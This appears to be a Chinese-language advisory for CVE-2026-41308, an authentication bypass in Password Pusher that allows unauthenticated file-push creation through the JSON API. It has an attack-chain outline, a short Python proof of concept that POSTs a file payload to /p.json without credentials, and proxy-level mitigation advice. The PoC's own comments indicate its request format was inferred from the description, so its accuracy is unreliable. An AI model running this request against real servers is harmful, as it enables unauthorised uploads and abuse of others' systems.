CVE-2026-41308 Password Pusher认证绕过漏洞

漏洞信息

漏洞编号

CVE-2026-41308

漏洞类型

认证绕过

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Password Pusher

漏洞概述

Password Pusher是一款用于在Web上传输敏感信息的开源应用。在1.69.3和2.4.2版本之前，该软件存在安全缺陷。攻击者可以在某些特定配置下，利用通用的JSON API创建路径，绕过身份验证机制，未经授权地创建文件类型的推送。此漏洞成功绕过了应用程序预设的身份验证边界，允许未授权用户进行文件推送操作，从而对系统的完整性和可用性造成潜在风险。

技术细节

该漏洞的核心在于Password Pusher后端对通用JSON API创建路径的访问控制逻辑存在缺陷。在特定配置下，应用程序未能对涉及文件推送创建的API请求实施严格的身份验证机制。正常情况下，创建文件推送应当要求用户经过认证，但受影响版本允许通过通用接口直接处理此类请求。攻击者可以通过网络向目标服务器发送特制的HTTP POST请求，请求体中包含构造好的JSON数据，指定资源类型为文件。由于服务器端校验缺失，攻击者无需提供有效的凭证（如Session Token或API Key）即可成功创建文件推送对象。这种未经授权的操作不仅违背了最小权限原则，还可能导致服务器存储空间被恶意占用或被用于分发恶意内容，进而影响系统的完整性与可用性。

攻击链分析

STEP 1

侦察与探测

攻击者识别出目标系统运行的是受影响版本的Password Pusher应用，并确认其开启了通用的JSON API创建路径。

STEP 2

构造攻击载荷

攻击者构造包含文件类型参数的JSON数据包，准备好无需凭证即可发送的HTTP POST请求。

STEP 3

发送未经授权的请求

攻击者向目标服务器的API端点发送恶意请求，由于存在认证绕过漏洞，服务器接受了该请求。

STEP 4

完成漏洞利用

服务器在未验证用户身份的情况下创建了文件推送记录，攻击者成功绕过安全边界。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# Target configuration
target_host = "http://vulnerable-host.com"
api_endpoint = "/p.json"  # Generic JSON API create path mentioned in description

# Construct the payload for a file-type push
# Based on the description, the vulnerability allows unauthenticated file push creation
payload = {
    "password": {
        "payload": "<base64_encoded_file_content>",
        "note": "Unauthorized File Upload",
        "type": "file"
    }
}

headers = {
    "Content-Type": "application/json",
    "User-Agent": "CVE-2026-41308-Scanner"
}

print(f"[*] Attempting to exploit {target_host}{api_endpoint}...")

try:
    # Send POST request without authentication
    response = requests.post(target_host + api_endpoint, data=json.dumps(payload), headers=headers, timeout=10)

    if response.status_code == 201 or response.status_code == 200:
        print("[+] Exploit successful! File push created without authentication.")
        print("[+] Response:")
        print(response.text)
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")
        print(response.text)

except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

Password Pusher < 1.69.3

Password Pusher < 2.4.2

防御指南

临时缓解措施

如果无法立即升级，建议在反向代理（如Nginx或Apache）层面限制对JSON API创建路径（如/p.json）的访问，仅允许受信任的内部IP或经过认证的代理服务器访问。同时，应密切监控系统日志，检测是否存在异常的文件创建请求，以便及时发现潜在的攻击行为。